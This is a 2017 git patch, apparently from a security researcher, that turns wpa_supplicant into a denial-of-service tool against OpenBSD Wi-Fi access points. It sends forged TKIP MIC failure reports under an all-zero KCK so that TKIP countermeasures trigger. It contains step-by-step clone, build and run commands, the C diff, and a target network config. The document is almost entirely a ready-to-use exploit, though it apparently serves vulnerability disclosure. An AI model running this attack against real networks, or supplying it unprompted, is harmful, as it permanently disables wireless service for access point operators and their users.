From 2926eedc7a16664bd33810123a4414397b9c52ff Mon Sep 17 00:00:00 2001
From: Mathy <vanhoefm@users.noreply.github.com>
Date: Sun, 23 Jul 2017 08:55:51 -0400
Subject: [PATCH] Perform OpenBSD TKIP DoS by exploiting all-zero KCK

This patch sends two TKIP MIC failure reports to the AP, protected using
an all-zero KCK, right after receiving message 1 from the AP. Due to a
state machine bug, the OpenBSD AP will accept these TKIP MIC failure
reports. As a result, the AP will activate the TKIP countermeasures. Due
to a bug in OpenBSD, this will cause a permanent denial-of-service
attack.

1. Compile a patched wpa_supplicant

git clone git://w1.fi/srv/git/hostap.git -b hostap_2_6 openbsd-dos
cd openbsd-dos
git apply attack_ap_dos.patch
cd wpa_supplicant
cp defconfig .config
make -j 8

2. Then edit network.conf so it contains the target SSID and run

sudo ./wpa_supplicant -D nl80211 -i $INTERFACE -c network.conf
---
 src/rsn_supp/wpa.c          | 8 ++++++++
 wpa_supplicant/defconfig    | 2 +-
 wpa_supplicant/network.conf | 6 ++++++
 3 files changed, 15 insertions(+), 1 deletion(-)
 create mode 100644 wpa_supplicant/network.conf

diff --git a/src/rsn_supp/wpa.c b/src/rsn_supp/wpa.c
index 3c4787925..731990a56 100644
--- a/src/rsn_supp/wpa.c
+++ b/src/rsn_supp/wpa.c
@@ -463,6 +463,14 @@ static void wpa_supplicant_process_1_of_4(struct wpa_sm *sm,
 	wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG, "WPA: RX message 1 of 4-Way "
 		"Handshake from " MACSTR " (ver=%d)", MAC2STR(src_addr), ver);
 
+	// Instantly send two EAPOL-Key request indicating a MIC failure, encrypted using all-zero KCK
+	printf(">> %s: sending two MIC failure reports using all-zero KCK\n", __FUNCTION__);
+	sm->ptk_set = 1;
+	wpa_sm_key_request(sm, 1, 1);
+	wpa_sm_key_request(sm, 1, 1);
+
+	exit(1);
+
 	os_memset(&ie, 0, sizeof(ie));
 
 	if (sm->proto == WPA_PROTO_RSN || sm->proto == WPA_PROTO_OSEN) {
diff --git a/wpa_supplicant/defconfig b/wpa_supplicant/defconfig
index 1d05198f8..a5f2fdc5a 100644
--- a/wpa_supplicant/defconfig
+++ b/wpa_supplicant/defconfig
@@ -44,7 +44,7 @@ CONFIG_DRIVER_NL80211=y
 #CONFIG_LIBNL20=y
 
 # Use libnl 3.2 libraries (if this is selected, CONFIG_LIBNL20 is ignored)
-#CONFIG_LIBNL32=y
+CONFIG_LIBNL32=y
 
 
 # Driver interface for FreeBSD net80211 layer (e.g., Atheros driver)
diff --git a/wpa_supplicant/network.conf b/wpa_supplicant/network.conf
new file mode 100644
index 000000000..13f68a49c
--- /dev/null
+++ b/wpa_supplicant/network.conf
@@ -0,0 +1,6 @@
+network={
+	ssid="OpenBSDWiFi"
+	psk="unknown_pass"
+
+	pairwise=TKIP
+}
-- 
2.11.0

